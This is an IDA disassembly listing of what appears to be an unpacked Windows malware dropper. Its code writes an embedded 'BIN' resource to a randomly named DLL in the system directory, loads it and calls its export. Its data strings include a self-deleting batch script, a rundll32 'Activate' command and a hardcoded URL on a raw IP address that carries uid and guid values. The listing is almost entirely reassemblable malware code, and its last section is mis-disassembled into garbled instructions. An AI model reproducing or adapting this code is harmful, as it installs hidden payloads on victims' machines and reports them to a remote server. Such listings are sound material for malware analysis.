;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DF8797330AEA3F9BE21DA39210B01150
; File Name : u:\work\df8797330aea3f9be21da39210b01150_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000D000 ( 53248.)
; Section size in file : 0000D000 ( 53248.)
; Offset to raw data for section: 00001000
; Flags E00000A0: Text Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; CODE XREF: sub_401156+87�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor esi, esi
push esi
push 80h
push 2
push esi
push 1
push 40000000h
push [ebp+arg_0]
xor ebx, ebx
call ds:dword_402008 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_401052
push esi
lea eax, [ebp+var_4]
push eax
mov [ebp+var_4], esi
mov esi, [ebp+arg_8]
push esi
push [ebp+arg_4]
push edi
call ds:dword_402004 ; WriteFile
test eax, eax
jz short loc_40104B
cmp [ebp+var_4], esi
jnz short loc_40104B
inc ebx
loc_40104B: ; CODE XREF: start+43�j start+48�j
push edi
call ds:dword_402000 ; CloseHandle
loc_401052: ; CODE XREF: start+29�j
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401059 proc near ; CODE XREF: sub_401156+94�p
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
push esi
push edi
mov esi, offset aAzxcdsweq ; "azxcdsweq"
lea edi, [ebp+var_14]
movsd
movsd
lea eax, [ebp+var_14]
push eax
mov [ebp+var_8], 10h
movsw
call ds:dword_402018 ; lstrlen
push 104h
lea eax, [ebp+var_128]
push eax
xor esi, esi
push esi
call ds:dword_402014 ; GetModuleFileNameA
mov edi, ds:dword_402008
push esi
push esi
push 3
pop ebx
push ebx
push esi
push ebx
push 80000000h
lea eax, [ebp+var_128]
push eax
call edi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_401148
push esi
push esi
push ebx
push esi
push ebx
push 40000000h
push [ebp+arg_0]
call edi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_4010E0
push [ebp+var_4]
call ds:dword_402000 ; CloseHandle
jmp short loc_401148
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401059+7A�j
mov edi, ds:dword_402010
push 2
push esi
push 0FFFFFFF3h
push [ebp+var_4]
call edi ; SetFilePointer
push esi
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
lea eax, [ebp+var_24]
push eax
push [ebp+var_4]
call ds:dword_40200C ; ReadFile
test eax, eax
jnz short loc_401114
push [ebp+var_4]
mov esi, ds:dword_402000
jmp short loc_401143
; ---------------------------------------------------------------------------
loc_401114: ; CODE XREF: sub_401059+AE�j
push 2
push esi
push 0FFFFFFF3h
push ebx
mov [ebp+var_8], 0Dh
call edi ; SetFilePointer
push esi
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_402004 ; WriteFile
test eax, eax
mov esi, ds:dword_402000
push [ebp+var_4]
jnz short loc_40114C
loc_401143: ; CODE XREF: sub_401059+B9�j
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
loc_401148: ; CODE XREF: sub_401059+60�j
; sub_401059+85�j
xor eax, eax
jmp short loc_401151
; ---------------------------------------------------------------------------
loc_40114C: ; CODE XREF: sub_401059+E8�j
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
loc_401151: ; CODE XREF: sub_401059+F1�j
pop edi
pop esi
pop ebx
leave
retn
sub_401059 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401156 proc near ; CODE XREF: .text:004012C3�p
var_1 = byte ptr -1
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_8]
push esi
push edi
push offset asc_4020EC ; "\\"
push 104h
push ebx
mov [ebp+var_1], 0
call ds:dword_402030 ; GetSystemDirectoryA
add eax, ebx
push eax
call ds:dword_402058 ; lstrcpy
push [ebp+arg_4]
push ebx
call ds:dword_40205C ; lstrcat
push 80h
push ebx
call ds:dword_402060 ; SetFileAttributesA
push 0
call ds:dword_40202C ; GetModuleHandleA
push offset aBin ; "BIN"
mov esi, eax
push 68h
push esi
call ds:dword_402028 ; FindResourceA
mov edi, eax
test edi, edi
jz short loc_4011F4
push edi
push esi
call ds:dword_402024 ; LoadResource
test eax, eax
jz short loc_4011F4
push eax
call ds:dword_402020 ; LockResource
test eax, eax
mov [ebp+arg_8], eax
jz short loc_4011F4
push edi
push esi
call ds:dword_40201C ; SizeofResource
test eax, eax
jz short loc_4011F4
push eax
push [ebp+arg_8]
push ebx
call start
add esp, 0Ch
test eax, eax
jz short loc_4011F4
push ebx
call sub_401059
pop ecx
mov [ebp+var_1], 1
loc_4011F4: ; CODE XREF: sub_401156+5A�j
; sub_401156+66�j ...
mov al, [ebp+var_1]
pop edi
pop esi
pop ebx
leave
retn
sub_401156 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011FC proc near ; CODE XREF: .text:004012AE�p
var_10 = dword ptr -10h
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
call ds:dword_40206C ; GetCursorPos
lea eax, [ebp+var_10]
push eax
call ds:dword_402038 ; GetSystemTimeAsFileTime
call ds:dword_402034 ; GetTickCount
movzx edx, [ebp+var_8]
mov ecx, eax
movzx eax, [ebp+var_4]
shl eax, 10h
or eax, edx
imul ecx, eax
imul ecx, [ebp+var_10]
imul ecx, [ebp+var_10]
xor edx, edx
push 19h
mov eax, ecx
pop edi
div edi
mov esi, [ebp+arg_0]
add dl, 61h
and [ebp+arg_0], 0
mov [esi], dl
loc_40124E: ; CODE XREF: sub_4011FC+85�j
xor edx, edx
push 5
pop ebx
mov eax, ecx
div ebx
push 19h
lea edi, [esi+1]
movsx eax, dl
movsx edx, byte ptr [esi]
add eax, edx
cdq
pop esi
idiv esi
mov eax, ecx
push 0Ah
pop ecx
mov esi, edi
add dl, 61h
mov [edi], dl
xor edx, edx
div ecx
inc [ebp+arg_0]
cmp [ebp+arg_0], 7
mov ecx, eax
jl short loc_40124E
push [ebp+arg_4]
mov byte ptr [esi], 2Eh
inc esi
push esi
call ds:dword_402058 ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4011FC endp
; ---------------------------------------------------------------------------
db 55h ; U
db 8Bh ;
db 0ECh ;
db 81h ;
db 0ECh ;
db 8
db 2
db 0
db 0
db 56h ; V
db 33h ; 3
db 0F6h ;
; ---------------------------------------------------------------------------
loc_4012A2: ; CODE XREF: .text:004012D6�j
lea eax, [ebp-104h]
push offset aDll ; "dll"
push eax
call sub_4011FC
lea eax, [ebp-208h]
push eax
lea eax, [ebp-104h]
push eax
push 1
call sub_401156
add esp, 14h
test al, al
jz short loc_4012D2
push 63h
pop esi
loc_4012D2: ; CODE XREF: .text:004012CD�j
inc esi
cmp esi, 1Eh
jl short loc_4012A2
cmp esi, 64h
jnz short loc_401306
lea eax, [ebp-208h]
push eax
call ds:dword_402044 ; LoadLibraryA
mov esi, eax
test esi, esi
jz short loc_401306
push 1
push esi
call ds:dword_402040 ; GetProcAddress
test eax, eax
jz short loc_4012FF
call eax
loc_4012FF: ; CODE XREF: .text:004012FB�j
push esi
call ds:dword_40203C ; FreeLibrary
loc_401306: ; CODE XREF: .text:004012DB�j
; .text:004012EE�j
xor al, al
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 55h ; U
db 8Bh ;
db 0ECh ;
db 81h ;
db 0ECh ;
db 70h ; p
db 4
db 0
db 0
db 53h ; S
db 56h ; V
db 57h ; W
db 0BEh ;
db 4
db 1
db 0
db 0
db 56h ; V
db 8Dh ;
db 85h ;
db 94h ;
db 0FCh ;
db 0FFh
db 0FFh
db 50h ; P
db 33h ; 3
db 0DBh ;
db 53h ; S
db 0FFh
db 15h
db 14h
db 20h
db 40h ; @
db 0
db 0BFh ;
db 80h ;
db 0
db 0
db 0
db 57h ; W
db 8Dh ;
db 85h ;
db 94h ;
db 0FCh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 15h
db 60h ; `
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 94h ;
db 0FCh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 15h
db 50h ; P
db 20h
db 40h ; @
db 0
db 3Bh ; ;
db 0C7h ;
db 74h ; t
db 7
db 32h ; 2
db 0C0h ;
db 0E9h ;
db 10h
db 1
db 0
db 0
db 8Dh ;
db 85h ;
db 90h ;
db 0FBh ;
db 0FFh
db 0FFh
db 50h ; P
db 56h ; V
db 88h ;
db 5Dh ; ]
db 0FFh
db 0FFh
db 15h
db 4Ch ; L
db 20h
db 40h ; @
db 0
db 8Bh ;
db 3Dh ; =
db 58h ; X
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 90h ;
db 0FBh ;
db 0FFh
db 0FFh
db 50h ; P
db 8Dh ;
db 85h ;
db 98h ;
db 0FDh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D7h ;
db 8Bh ;
db 35h ; 5
db 5Ch ; \
db 20h
db 40h ; @
db 0
db 68h ; h
db 84h ;
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 98h ;
db 0FDh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D6h ;
db 53h ; S
db 53h ; S
db 6Ah ; j
db 2
db 53h ; S
db 53h ; S
db 68h ; h
db 0
db 0
db 0
db 40h ; @
db 8Dh ;
db 85h ;
db 98h ;
db 0FDh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 15h
db 8
db 20h
db 40h ; @
db 0
db 3Bh ; ;
db 0C3h ;
db 89h ;
db 45h ; E
db 0F8h ;
db 0Fh
db 84h ;
db 0AFh ;
db 0
db 0
db 0
db 53h ; S
db 8Dh ;
db 4Dh ; M
db 0E4h ;
db 51h ; Q
db 6Ah ; j
db 2Bh ; +
db 68h ; h
db 94h ;
db 20h
db 40h ; @
db 0
db 50h ; P
db 0FFh
db 15h
db 4
db 20h
db 40h ; @
db 0
db 0FFh
db 75h ; u
db 0F8h ;
db 0FFh
db 15h
db 0
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 98h ;
db 0FDh ;
db 0FFh
db 0FFh
db 50h ; P
db 8Dh ;
db 85h ;
db 9Ch ;
db 0FEh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D7h ;
db 68h ; h
db 0F8h ;
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 9Ch ;
db 0FEh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D6h ;
db 8Dh ;
db 85h ;
db 94h ;
db 0FCh ;
db 0FFh
db 0FFh
db 50h ; P
db 8Dh ;
db 85h ;
db 9Ch ;
db 0FEh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D6h ;
db 68h ; h
db 0F4h ;
db 20h
db 40h ; @
db 0
db 8Dh ;
db 85h ;
db 9Ch ;
db 0FEh ;
db 0FFh
db 0FFh
db 50h ; P
db 0FFh
db 0D6h ;
db 6Ah ; j
db 10h
db 59h ; Y
db 33h ; 3
db 0C0h ;
db 8Dh ;
db 7Dh ; }
db 0A4h ;
db 0F3h ;
db 0ABh ;
db 89h ;
db 5Dh ; ]
db 0E8h ;
db 8Dh ;
db 7Dh ; }
db 0ECh ;
db 0ABh ;
db 0ABh ;
db 0ABh ;
db 8Dh ;
db 45h ; E
db 0E8h ;
db 50h ; P
db 8Dh ;
db 45h ; E
db 0A0h ;
db 50h ; P
db 53h ; S
db 53h ; S
db 53h ; S
db 53h ; S
db 53h ; S
db 53h ; S
db 8Dh ;
db 85h ;
db 9Ch ;
db 0FEh ;
db 0FFh
db 0FFh
db 50h ; P
db 53h ; S
db 0C7h ;
db 45h ; E
db 0A0h ;
db 44h ; D
db 0
db 0
db 0
db 0C7h ;
db 45h ; E
db 0CCh ;
db 1
db 0
db 0
db 0
db 66h ; f
db 89h ;
db 5Dh ; ]
db 0D0h ;
db 0FFh
db 15h
db 48h ; H
db 20h
db 40h ; @
db 0
db 0FFh
db 75h ; u
db 0ECh ;
db 8Bh ;
db 35h ; 5
db 0
db 20h
db 40h ; @
db 0
db 85h ;
db 0C0h ;
db 0Fh
db 95h ;
db 45h ; E
db 0FFh
db 0FFh
db 0D6h ;
db 0FFh
db 75h ; u
db 0E8h ;
db 0FFh
db 0D6h ;
db 8Ah ;
db 45h ; E
db 0FFh
db 5Fh ; _
db 5Eh ; ^
db 5Bh ; [
db 0C9h ;
db 0C3h ;
db 81h, 0ECh, 4
dd 8B000001h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 8B909090h, 905850C0h
dd 8B909090h, 905850C0h, 8B909090h, 905850C0h, 8B909090h
dd 905850C0h, 8B909090h, 905850C0h, 68909090h, 403108h
dd 40300068h, 24448D00h, 21006808h, 0FF500040h, 40206815h
dd 10C48300h, 0FFF541E8h, 0F5B1E8FFh, 6AFFFFh, 205415FFh
dd 0CC0040h, 0A7h dup(0)
dword_402000 dd 77E77963h ; DATA XREF: start+4C�r sub_401059+7F�r ...
dword_402004 dd 77E79D8Ch ; DATA XREF: start+3B�r sub_401059+D7�r
dword_402008 dd 77E7A837h ; DATA XREF: start+1E�r sub_401059+3E�r ...
dword_40200C dd 77E78B82h ; DATA XREF: sub_401059+A6�r
dword_402010 dd 77E78C81h ; DATA XREF: sub_401059:loc_4010E0�r
dword_402014 dd 77E7A099h ; DATA XREF: sub_401059+38�r
dword_402018 dd 77E74672h ; DATA XREF: sub_401059+23�r
dword_40201C dd 77E7105Fh ; DATA XREF: sub_401156+78�r
dword_402020 dd 77E7C931h ; DATA XREF: sub_401156+69�r
dword_402024 dd 77E760B5h ; DATA XREF: sub_401156+5E�r
dword_402028 dd 77E6CA8Ah ; DATA XREF: sub_401156+50�r
dword_40202C dd 77E79F93h ; DATA XREF: sub_401156+40�r
dword_402030 dd 77E704FCh ; DATA XREF: sub_401156+19�r
dword_402034 dd 77E7751Ah ; DATA XREF: sub_4011FC+1D�r
dword_402038 dd 77E6167Bh ; DATA XREF: sub_4011FC+17�r
dword_40203C dd 77E80618h ; DATA XREF: .text:00401300�r
dword_402040 dd 77E7A5FDh ; DATA XREF: .text:004012F3�r
dword_402044 dd 77E805D8h ; DATA XREF: .text:004012E4�r
dd 77E61BB8h
dd 77E6AD34h
dd 77E74CABh
dd 77E75CB5h
dword_402058 dd 77E73167h ; DATA XREF: sub_401156+22�r
; sub_4011FC+8F�r
dword_40205C dd 77E74155h ; DATA XREF: sub_401156+2C�r
dword_402060 dd 77E70396h ; DATA XREF: sub_401156+38�r
align 8
dd 77D4C96Ah
dword_40206C dd 77D46349h ; DATA XREF: sub_4011FC+D�r
dd 2 dup(0)
aHookproc db 'HookProc',0
align 4
aRemovalfile_ba db 'removalfile.bat',0
a@echoOffDfDel1 db '@echo off',0Dh,0Ah
db ':df',0Dh,0Ah
db 'del %1',0Dh,0Ah
db 'if exist %1 goto df',0
aRundll32_exeSA db 'rundll32.exe %s,Activate',0
align 4
aAzxcdsweq db 'azxcdsweq',0 ; DATA XREF: sub_401059+C�o
align 4
aBin db 'BIN',0 ; DATA XREF: sub_401156+46�o
asc_4020EC: ; DATA XREF: sub_401156+A�o
unicode 0, <\>,0
aDll db 'dll',0 ; DATA XREF: .text:004012A8�o
unicode 0, <">,0
db ' "',0
align 10h
aHttp65_243_103 db 'http://65.243.103.60/go//?cmp=vmtek_update&lid=run&uid=%s&guid=%s'
db 0
align 4
dd 0A2h dup(0)
dd 41564441h, 32334950h, 6C6C642Eh, 720h dup(0)
dd 420003h, 4E0049h, 2180h dup(0)
aPaddingxxpaddi db 'PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGP'
db 'ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPA'
db 'DDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPAD'
db 'DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD'
db 'INGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI'
db 'NGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDIN'
db 'GXXPADDINGPADDINGXXPADDING',0
align 4
dd 1FFh dup(0)
dd 60h, 1000h, 6F6C4301h, 61486573h, 656C646Eh, 72570100h
dd 46657469h, 656C69h, 65724301h, 46657461h, 41656C69h
dd 65520100h, 69466461h, 100656Ch, 46746553h, 50656C69h
dd 746E696Fh, 1007265h, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 416E656Ch, 69530100h
dd 666F657Ah, 6F736552h, 65637275h, 6F4C0100h, 65526B63h
dd 72756F73h, 1006563h, 64616F4Ch, 6F736552h, 65637275h
dd 69460100h, 6552646Eh, 72756F73h, 416563h, 74654701h
dd 75646F4Dh, 6148656Ch, 656C646Eh, 47010041h, 79537465h
dd 6D657473h, 65726944h, 726F7463h, 1004179h, 54746547h
dd 436B6369h, 746E756Fh, 65470100h, 73795374h, 546D6574h
dd 41656D69h, 6C694673h, 6D695465h, 46010065h, 4C656572h
dd 61726269h, 1007972h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72430100h
dd 65746165h, 636F7250h, 41737365h, 65470100h, 6D655474h
dd 74615070h, 1004168h, 46746547h, 41656C69h, 69727474h
dd 65747562h, 1004173h, 74697845h, 636F7250h, 737365h
dd 74736C01h, 79706372h, 6C010041h, 63727473h, 417461h
dd 74655301h, 656C6946h, 72747441h, 74756269h, 417365h
dd 6D00h, 106800h, 73770100h, 6E697270h, 416674h, 74654701h
dd 73727543h, 6F50726Fh, 73h, 50000000h, 4C000045h, 9C000401h
dd 46F11Dh, 0
dd 0E0000000h, 0B010F00h, 0A0701h, 0Eh, 8Ch, 6D000000h
dd 14h, 10h, 20h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 0D0h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 44000000h, 3C000021h, 0
dd 60000040h, 86h, 12h dup(0)
dd 74000020h, 6 dup(0)
dd 2E000000h, 74786574h, 0
dd 2 dup(10h), 0Eh, 4, 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 61h, 10h, 20h, 4, 12h
dd 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 0
dd 10h, 30h, 4 dup(0)
dd 40000000h, 2EC00000h, 63727372h, 0
db 90h
align 4
dd 40h, 88h, 16h, 2 dup(0)
dd 40000000h, 400000h, 0F40000C0h, 21h, 0C1A700h, 32Dh dup(0)
_text ends
; Section 2. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0000E000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read
_data segment para public 'DATA' use32
assume cs:_data
;org 40E000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 0FFF97F77h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor esi, esi
push esi
push 26A0080h
push esi
push 1
push 75FF4008h
idiv bh
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 8
; ---------------------------------------------------------------------------
xor ebx, ebx
call ds:dword_402008 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short near ptr loc_40E055+1
push esi
lea eax, [ebp-4]
push eax
mov [ebp-4], esi
mov esi, [ebp+10h]
push esi
sbb eax, 0ED9BEDEEh
or al, 57h
sbb al, 4
test eax, eax
jz short near ptr loc_40E048+6
loc_40E048: ; CODE XREF: .data:0040E046�j
cmp ds:0AE104301h[esi*2], edx
mov ebp, 5F009BFBh
pop esi
loc_40E055: ; CODE XREF: .data:0040E02D�j
mov eax, ebx
pop ebx
leave
retn
; ---------------------------------------------------------------------------
dw 8158h
